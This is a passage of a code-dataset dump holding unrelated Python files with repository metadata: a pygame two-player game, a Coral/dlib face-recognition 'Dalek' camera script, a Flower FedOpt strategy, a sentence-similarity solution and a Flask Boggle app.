pygame.K_DOWN:\n two_moving_down = True\n\n if event.key == pygame.K_ESCAPE:\n pause()\n\n if event.type == pygame.KEYUP:\n # -movement\n if event.key == pygame.K_a:\n one_moving_left = False\n if event.key == pygame.K_d:\n one_moving_right = False\n if event.key == pygame.K_w:\n one_moving_up = False\n if event.key == pygame.K_s:\n one_moving_down = False\n\n if event.key == pygame.K_LEFT:\n two_moving_left = False\n if event.key == pygame.K_RIGHT:\n two_moving_right = False\n if event.key == pygame.K_UP:\n two_moving_up = False\n if event.key == pygame.K_DOWN:\n two_moving_down = False\n\n pygame.display.update()\n\ndef main_menu():\n main_menu_music.play(-1, 0, 0)\n button_play = pygame.image.load('ui/button_play.png')\n button_play_hover = pygame.image.load('ui/button_play_hover.png')\n button_exit = pygame.image.load('ui/button_exit.png')\n button_exit_hover = pygame.image.load('ui/button_exit_hover.png')\n while True:\n clock.tick(FPS)\n draw_bg()\n global click, musicB\n\n mx, my = pygame.mouse.get_pos()\n\n logo = pygame.image.load('misc/logo.png')\n screen.blit(logo, (100, 200))\n\n screen.blit(button_play, (100, 400))\n button_play_rect = pygame.Rect(100, 400, 350, 100)\n if button_play_rect.collidepoint((mx, my)):\n screen.blit(button_play_hover, (100, 400))\n if click:\n main_menu_music.fadeout(2000)\n fade(SCREEN_WIDTH, SCREEN_HEIGHT, button_play, button_exit, logo)\n game()\n screen.blit(button_exit, (550, 400))\n button_exit_rect = pygame.Rect(550, 400, 350, 100)\n if button_exit_rect.collidepoint((mx, my)):\n screen.blit(button_exit_hover, (550, 400))\n if click:\n pygame.quit()\n sys.exit()\n click = False\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if event.button == 1:\n click = True\n\n pygame.display.update()\n\n\nmain_menu()", "repo_name": "Rijad-Ismailovic/Laser-Bound", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 15487, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pygame.init", "line_number": 6, "usage_type": "call"}, {"api_name": "pygame.mixer.init", "line_number": 7, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 7, "usage_type": "name"}, {"api_name": "pygame.font.init", "line_number": 8, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 8, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 14, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 20, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pygame.display.set_icon", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 23, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 23, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 24, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 24, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 25, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 25, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 28, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 28, "usage_type": 
"attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 31, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 31, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 33, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 33, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 37, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 37, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 38, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 39, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 39, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 42, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 42, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 43, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 43, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 57, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 63, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 64, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 64, "usage_type": "attribute"}, {"api_name": "math.pi", "line_number": 98, "usage_type": "attribute"}, {"api_name": "math.atan2", "line_number": 98, "usage_type": "call"}, {"api_name": "pygame.transform.rotozoom", "line_number": 100, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 100, "usage_type": "attribute"}, {"api_name": "pygame.transform.rotozoom", "line_number": 103, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 103, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 108, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Sprite.__init__", "line_number": 110, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 110, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 113, "usage_type": "call"}, {"api_name": "pygame.image.load", "line_number": 116, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 116, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 117, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 117, "usage_type": "attribute"}, {"api_name": "math.pi", "line_number": 151, "usage_type": "attribute"}, {"api_name": "math.atan2", "line_number": 151, "usage_type": "call"}, {"api_name": "pygame.transform.rotozoom", "line_number": 152, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 152, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 161, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 161, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 162, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 162, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 163, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 163, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 164, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 164, "usage_type": "attribute"}, {"api_name": 
"pygame.math.Vector2", "line_number": 169, "usage_type": "call"}, {"api_name": "pygame.math", "line_number": 169, "usage_type": "attribute"}, {"api_name": "pygame.math.Vector2", "line_number": 170, "usage_type": "call"}, {"api_name": "pygame.math", "line_number": 170, "usage_type": "attribute"}, {"api_name": "pygame.math.Vector2", "line_number": 171, "usage_type": "call"}, {"api_name": "pygame.math", "line_number": 171, "usage_type": "attribute"}, {"api_name": "pygame.Surface", "line_number": 176, "usage_type": "call"}, {"api_name": "pygame.display.update", "line_number": 185, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 185, "usage_type": "attribute"}, {"api_name": "pygame.time.delay", "line_number": 186, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 186, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 191, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 191, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 192, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 192, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 193, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 193, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 194, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 194, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 195, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 195, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 205, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 205, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 208, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 216, "usage_type": "call"}, {"api_name": "pygame.exit", "line_number": 220, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 221, "usage_type": "call"}, {"api_name": "pygame.event.get", "line_number": 224, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 224, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 225, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 226, "usage_type": "call"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 227, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 231, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 231, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 239, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 239, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 246, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 246, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 247, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 248, "usage_type": "call"}, {"api_name": "pygame.KEYDOWN", "line_number": 250, "usage_type": "attribute"}, {"api_name": "pygame.K_ESCAPE", "line_number": 251, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 261, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 261, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 265, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 265, "usage_type": "attribute"}, {"api_name": 
"pygame.time.Clock", "line_number": 287, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 287, "usage_type": "attribute"}, {"api_name": "pygame.draw.line", "line_number": 346, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 346, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 352, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 354, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 356, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 358, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 360, "usage_type": "call"}, {"api_name": "pygame.event.get", "line_number": 378, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 378, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 379, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 380, "usage_type": "call"}, {"api_name": "pygame.KEYDOWN", "line_number": 384, "usage_type": "attribute"}, {"api_name": "pygame.K_a", "line_number": 386, "usage_type": "attribute"}, {"api_name": "pygame.K_d", "line_number": 388, "usage_type": "attribute"}, {"api_name": "pygame.K_w", "line_number": 390, "usage_type": "attribute"}, {"api_name": "pygame.K_s", "line_number": 392, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 395, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 397, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 399, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 401, "usage_type": "attribute"}, {"api_name": "pygame.K_ESCAPE", "line_number": 404, "usage_type": "attribute"}, {"api_name": "pygame.KEYUP", "line_number": 407, "usage_type": "attribute"}, {"api_name": "pygame.K_a", "line_number": 409, "usage_type": "attribute"}, {"api_name": "pygame.K_d", "line_number": 411, "usage_type": "attribute"}, {"api_name": "pygame.K_w", "line_number": 413, "usage_type": "attribute"}, {"api_name": "pygame.K_s", "line_number": 415, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 418, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 420, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 422, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 424, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 427, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 427, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 431, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 431, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 432, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 432, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 433, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 433, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 434, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 434, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 440, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 440, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 442, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 442, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 446, 
"usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 454, "usage_type": "call"}, {"api_name": "pygame.quit", "line_number": 458, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 459, "usage_type": "call"}, {"api_name": "pygame.event.get", "line_number": 462, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 462, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 463, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 464, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 465, "usage_type": "call"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 466, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 470, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 470, "usage_type": "attribute"}]} +{"seq_id": "34839705788", "text": "import time\nimport sys\nimport argparse\n\n# import image and DL processing\nimport cv2\nimport numpy as np\nimport dlib\nfrom random import randrange\n# from edgetpu.detection.engine import DetectionEngine\nfrom pycoral.adapters import common\nfrom pycoral.adapters import detect\nfrom pycoral.utils.edgetpu import make_interpreter\nfrom scipy.interpolate import UnivariateSpline\n\nfrom imutils.video import VideoStream\nfrom PIL import Image, ImageDraw\n\n# import local helper classes\nfrom faceextractor import FaceDataExtractor\nfrom recognizer import FaceRecognizer\n\n# construct the argument parser and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-o\", \"--output\", default=False, action=\"store_true\",\n\thelp=\"Display dalek PoV\")\nap.add_argument(\"-f\", \"--face\", type=float, default=0.7,\n\thelp=\"Face detection certainty\")\nap.add_argument(\"-r\", \"--recognize\", type=float, default=0.7,\n\thelp=\"Face recognition certainty\")\nargs = vars(ap.parse_args())\n\nprint(args)\n\nprint(\"Loading face detection engine...\")\ninterpreter = make_interpreter(\"/home/pi/coral-dalek/mobilenet_ssd_v2_face_quant_postprocess_edgetpu.tflite\")\ninterpreter.allocate_tensors()\n\nprint(\"Loading face landmark detection engine...\")\nshape_pred = dlib.shape_predictor(\"./shape_predictor_5_face_landmarks.dat\")\nface_ext = FaceDataExtractor()\nprint(\"Loading face recognitn engine...\")\nfacerec = dlib.face_recognition_model_v1(\"./dlib_face_recognition_resnet_model_v1.dat\")\nface_recog = FaceRecognizer()\n\n# https://www.askaswiss.com/2016/02/how-to-manipulate-color-temperature-opencv-python.html\n\nif args['output']:\n pov = 0\n overlay=[]\n overlay.append(cv2.imread('dalekpov-a.png'))\n overlay.append(cv2.imread('dalekpov-b.png'))\n overlay.append(cv2.imread('dalekpov-c.png'))\n\n def create_transform(x, y):\n spl = UnivariateSpline(x, y)\n return spl(range(256))\n\n inc_col = create_transform([0, 64, 128, 192, 256],[150, 175, 200, 225, 256])\n dec_col = create_transform([0, 64, 128, 192, 256],[28, 64, 90, 110, 128])\n\nprint(\"Starting video capture\")\n\nvc = cv2.VideoCapture(0)\nif not vc.isOpened():\n print(\"Cannot open USB camera.\")\n exit()\n\ncap_width = vc.get(cv2.CAP_PROP_FRAME_WIDTH)\ncap_height = vc.get(cv2.CAP_PROP_FRAME_HEIGHT)\ncap_fps = vc.get(cv2.CAP_PROP_FPS)\nprint(cap_width,\" x \", cap_height,\" @ \", cap_fps)\n\nprint(\"Entering main loop, press CTRL+C to exit...\")\nwhile True:\n try:\n ret, frame = vc.read()\n if not ret:\n print(\"No frame received from camera; exiting...\")\n break\n # Convert frame from color_coverted = cv2.cvtColor(opencv_image, cv2.COLOR_BGR2RGB)\n 
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n image = Image.fromarray(frame)\n _, scale = common.set_resized_input(\n interpreter, image.size, lambda size: image.resize(size, Image.ANTIALIAS))\n interpreter.invoke()\n face_box_list = detect.get_objects(interpreter, args['face'], scale)\n\n draw = ImageDraw.Draw(image)\n for face in face_box_list:\n bbox = face.bbox\n draw.rectangle([(bbox.xmin, bbox.ymin), (bbox.xmax, bbox.ymax)], outline='black')\n box = dlib.rectangle(left = bbox.xmin,\n right = bbox.xmax,\n top = bbox.ymin,\n bottom = bbox.ymax)\n shape = shape_pred(frame, box)\n if shape:\n face_chip_img = dlib.get_face_chip(frame, shape)\n face_descriptor = facerec.compute_face_descriptor(face_chip_img)\n name = face_recog.recognize_face(face_descriptor, threshold = args['recognize'])\n if name:\n if output:\n draw.text((bbox.xmin, bbox.ymin - 20), name, fill='black')\n else:\n print(name)\n \n if args['output']:\n displayImage = np.asarray(image)\n blue, green, red = cv2.split(displayImage)\n red = cv2.LUT(red, dec_col).astype(np.uint8)\n blue = cv2.LUT(blue, dec_col).astype(np.uint8)\n green = cv2.LUT(green, inc_col).astype(np.uint8)\n displayImage = cv2.merge((red, green, blue))\n\n # displayImage = cv2.cvtColor(displayImage, cv2.COLOR_BGR2GRAY)\n if (randrange(10) > 6): pov = randrange(3)\n displayImage = cv2.addWeighted(displayImage,0.8,overlay[pov],0.2,0)\n cv2.imshow('Dalek Fry Eyestalk PoV', displayImage)\n if cv2.waitKey(1) == ord('q'):\n raise KeyboardInterrupt\n except KeyboardInterrupt:\n vc.release()\n cv2.destroyAllWindows()\n print(\"Program halted by CTRL+C\")\n sys.exit(0)", "repo_name": "hopkira/coral-dalek", "sub_path": "new_vision.py", "file_name": "new_vision.py", "file_ext": "py", "file_size_in_byte": 4719, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 24, "usage_type": "call"}, {"api_name": "pycoral.utils.edgetpu.make_interpreter", "line_number": 36, "usage_type": "call"}, {"api_name": "dlib.shape_predictor", "line_number": 40, "usage_type": "call"}, {"api_name": "faceextractor.FaceDataExtractor", "line_number": 41, "usage_type": "call"}, {"api_name": "dlib.face_recognition_model_v1", "line_number": 43, "usage_type": "call"}, {"api_name": "recognizer.FaceRecognizer", "line_number": 44, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 51, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 52, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 53, "usage_type": "call"}, {"api_name": "scipy.interpolate.UnivariateSpline", "line_number": 56, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 64, "usage_type": "call"}, {"api_name": "cv2.CAP_PROP_FRAME_WIDTH", "line_number": 69, "usage_type": "attribute"}, {"api_name": "cv2.CAP_PROP_FRAME_HEIGHT", "line_number": 70, "usage_type": "attribute"}, {"api_name": "cv2.CAP_PROP_FPS", "line_number": 71, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 82, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 82, "usage_type": "attribute"}, {"api_name": "PIL.Image.fromarray", "line_number": 83, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 83, "usage_type": "name"}, {"api_name": "pycoral.adapters.common.set_resized_input", "line_number": 84, "usage_type": "call"}, {"api_name": "pycoral.adapters.common", "line_number": 84, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", 
"line_number": 85, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 85, "usage_type": "name"}, {"api_name": "pycoral.adapters.detect.get_objects", "line_number": 87, "usage_type": "call"}, {"api_name": "pycoral.adapters.detect", "line_number": 87, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 89, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 89, "usage_type": "name"}, {"api_name": "dlib.rectangle", "line_number": 93, "usage_type": "call"}, {"api_name": "dlib.get_face_chip", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 109, "usage_type": "call"}, {"api_name": "cv2.split", "line_number": 110, "usage_type": "call"}, {"api_name": "cv2.LUT", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 111, "usage_type": "attribute"}, {"api_name": "cv2.LUT", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 112, "usage_type": "attribute"}, {"api_name": "cv2.LUT", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 113, "usage_type": "attribute"}, {"api_name": "cv2.merge", "line_number": 114, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 117, "usage_type": "call"}, {"api_name": "cv2.addWeighted", "line_number": 118, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 119, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 120, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 124, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 126, "usage_type": "call"}]} +{"seq_id": "3927966183", "text": "# ! This code has been copied from https://github.com/adap/flower/blob/main/src/py/flwr/server/strategy/fedopt.py commit 59a32d5\n# and removed the annoying requirement of having to pass the initialized model at construction time\n\nfrom tkinter import E\nfrom typing import Callable, Dict, Optional, Tuple\n\nfrom flwr.common import Parameters, Scalar, Weights, parameters_to_weights\n\nfrom flwr.server.strategy import FedAvg\n\nimport pickle\n\nclass FedOpt(FedAvg):\n \"\"\"Configurable FedAdagrad strategy implementation.\"\"\"\n\n # pylint: disable=too-many-arguments,too-many-instance-attributes,too-many-locals\n def __init__(\n self,\n *,\n fraction_fit: float = 0.1,\n fraction_eval: float = 0.1,\n min_fit_clients: int = 2,\n min_eval_clients: int = 2,\n min_available_clients: int = 2,\n eval_fn: Optional[\n Callable[[Weights], Optional[Tuple[float, Dict[str, Scalar]]]]\n ] = None,\n on_fit_config_fn: Optional[Callable[[int], Dict[str, Scalar]]] = None,\n on_evaluate_config_fn: Optional[Callable[[int], Dict[str, Scalar]]] = None,\n accept_failures: bool = True,\n initial_parameters: Parameters,\n eta: float = 1e-1,\n eta_l: float = 1e-1,\n beta_1: float = 0.0,\n beta_2: float = 0.0,\n tau: float = 1e-9,\n ) -> None:\n \"\"\"Federated Optim strategy interface.\n Implementation based on https://arxiv.org/abs/2003.00295\n Args:\n fraction_fit (float, optional): Fraction of clients used during\n training. Defaults to 0.1.\n fraction_eval (float, optional): Fraction of clients used during\n validation. Defaults to 0.1.\n min_fit_clients (int, optional): Minimum number of clients used\n during training. Defaults to 2.\n min_eval_clients (int, optional): Minimum number of clients used\n during validation. Defaults to 2.\n min_available_clients (int, optional): Minimum number of total\n clients in the system. 
Defaults to 2.\n eval_fn (Callable[[Weights], Optional[Tuple[float, float]]], optional):\n Function used for validation. Defaults to None.\n on_fit_config_fn (Callable[[int], Dict[str, str]], optional):\n Function used to configure training. Defaults to None.\n on_evaluate_config_fn (Callable[[int], Dict[str, str]], optional):\n Function used to configure validation. Defaults to None.\n accept_failures (bool, optional): Whether or not accept rounds\n containing failures. Defaults to True.\n initial_parameters (Parameters): Initial set of parameters from the server.\n eta (float, optional): Server-side learning rate. Defaults to 1e-1.\n eta_l (float, optional): Client-side learning rate. Defaults to 1e-1.\n beta_1 (float, optional): Momentum parameter. Defaults to 0.0.\n beta_2 (float, optional): Second moment parameter. Defaults to 0.0.\n tau (float, optional): Controls the algorithm's degree of adaptability.\n Defaults to 1e-9.\n \"\"\"\n super().__init__(\n fraction_fit=fraction_fit,\n fraction_eval=fraction_eval,\n min_fit_clients=min_fit_clients,\n min_eval_clients=min_eval_clients,\n min_available_clients=min_available_clients,\n eval_fn=eval_fn,\n on_fit_config_fn=on_fit_config_fn,\n on_evaluate_config_fn=on_evaluate_config_fn,\n accept_failures=accept_failures,\n initial_parameters=initial_parameters,\n )\n\n if initial_parameters:\n self.current_weights = parameters_to_weights(initial_parameters)\n else:\n self.current_weights = None\n # ! this will trigger a crash if the user doesn't copy the sever weights before the 1st round begin\n print('type of current weights:',type(self.current_weights))\n self.eta = eta\n self.eta_l = eta_l\n self.tau = tau\n self.beta_1 = beta_1\n self.beta_2 = beta_2\n\n def __repr__(self) -> str:\n rep = f\"FedOpt(accept_failures={self.accept_failures})\"\n return rep", "repo_name": "royson/fedl2p", "sub_path": "src/server/strategies/fedopt.py", "file_name": "fedopt.py", "file_ext": "py", "file_size_in_byte": 4285, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 10, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flwr.server.strategy.FedAvg", "line_number": 13, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 25, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 26, "usage_type": "name"}, {"api_name": "flwr.common.Weights", "line_number": 26, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 26, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 26, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 26, "usage_type": "name"}, {"api_name": "flwr.common.Scalar", "line_number": 26, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 28, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 28, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 28, "usage_type": "name"}, {"api_name": "flwr.common.Scalar", "line_number": 28, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 29, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 29, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 29, "usage_type": "name"}, {"api_name": "flwr.common.Scalar", "line_number": 29, "usage_type": "name"}, {"api_name": "flwr.common.Parameters", "line_number": 31, "usage_type": "name"}, {"api_name": "flwr.common.parameters_to_weights", "line_number": 81, "usage_type": "call"}]} +{"seq_id": "5378424986", "text": "from collections import defaultdict\n\nclass 
SentenceSimilarity:\n def areSentencesSimilar(self, words1: 'List[str]', words2: 'List[str]', pairs: 'List[List[str]]') -> bool:\n if len(words1) != len(words2): return False\n p_dict = defaultdict(set)\n for p1, p2 in pairs:\n p_dict[p1].add(p2)\n p_dict[p2].add(p1)\n for i in range(len(words1)):\n if words1[i] == words2[i] or\\\n (words1[i] in p_dict and words2[i] in p_dict[words1[i]]):\n continue\n return False\n return True\n", "repo_name": "yokolet/tranquil-beach-python", "sub_path": "tranquil-beach/sorting_searching/sentence_similarity.py", "file_name": "sentence_similarity.py", "file_ext": "py", "file_size_in_byte": 574, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.defaultdict", "line_number": 6, "usage_type": "call"}]} +{"seq_id": "71517699048", "text": "from flask import Flask, request, render_template, redirect, flash, session, jsonify\n# from flask_debugtoolbar import DebugToolbarExtension\n\nfrom boggle import Boggle\n\nboggle_game = Boggle()\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'folke'\n\n# debug = DebugToolbarExtension(app)\n\n@app.route('/')\ndef start_game():\n \"\"\" Generate game html\"\"\"\n\n # Create board and store it in session\n session['board'] = boggle_game.make_board()\n\n # If player has played before, add session info for highest score and times played.\n highscore = session.get('highscore', 0)\n times_played = session.get('times_played', 0)\n\n return render_template('game.html', board = session['board'], times_played = times_played, highscore = highscore)\n \n@app.route('/check-word')\ndef check_word():\n word = request.args['word']\n check_word = boggle_game.check_valid_word(session['board'], word)\n\n return ({'result': check_word})\n\n\n@app.route('/gameover', methods=['POST'])\ndef get_score():\n \"\"\" Add highscore and times_played to session \"\"\"\n\n # If highscore exists, check if current score from front-end is higher or not.\n if 'highscore' in session:\n if session['highscore'] < request.json['score']:\n session['highscore'] = request.json['score']\n else:\n session['highscore'] = request.json['score']\n\n # Increment times_played by one\n session['times_played'] = session.get('times_played', 0) + 1\n\n return ''", "repo_name": "f-westergren/flask-boggle", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1455, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "boggle.Boggle", "line_number": 6, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 8, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 18, "usage_type": "name"}, {"api_name": "flask.session.get", "line_number": 21, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 21, "usage_type": "name"}, {"api_name": "flask.session.get", "line_number": 22, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 22, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 24, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 28, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 28, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 29, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 39, "usage_type": "name"}, {"api_name": "flask.session", 
